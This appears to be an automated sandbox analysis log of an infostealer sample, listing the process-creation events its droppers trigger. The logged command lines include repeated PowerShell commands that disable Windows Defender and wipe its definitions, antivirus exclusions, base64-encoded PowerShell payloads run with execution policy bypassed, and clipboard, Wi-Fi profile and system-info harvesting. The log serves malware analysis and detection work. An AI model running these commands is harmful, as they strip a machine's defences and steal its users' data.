                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\setup.exeThread register set: target process: 2288
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\setup.exeMemory written: C:\Windows\System32\dialer.exe base: C991E5F010
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="Jump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="Jump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe "C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkaaqbqacmapgbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajahiacgbwacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccazqbyahiabwbyadoaiablahgacablagmadablagqaiaanaccaowanaccaiabiaguazgbvahiazqagaccajwbyaguadab1ahiabganaccajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajaggaegb5acmapga="
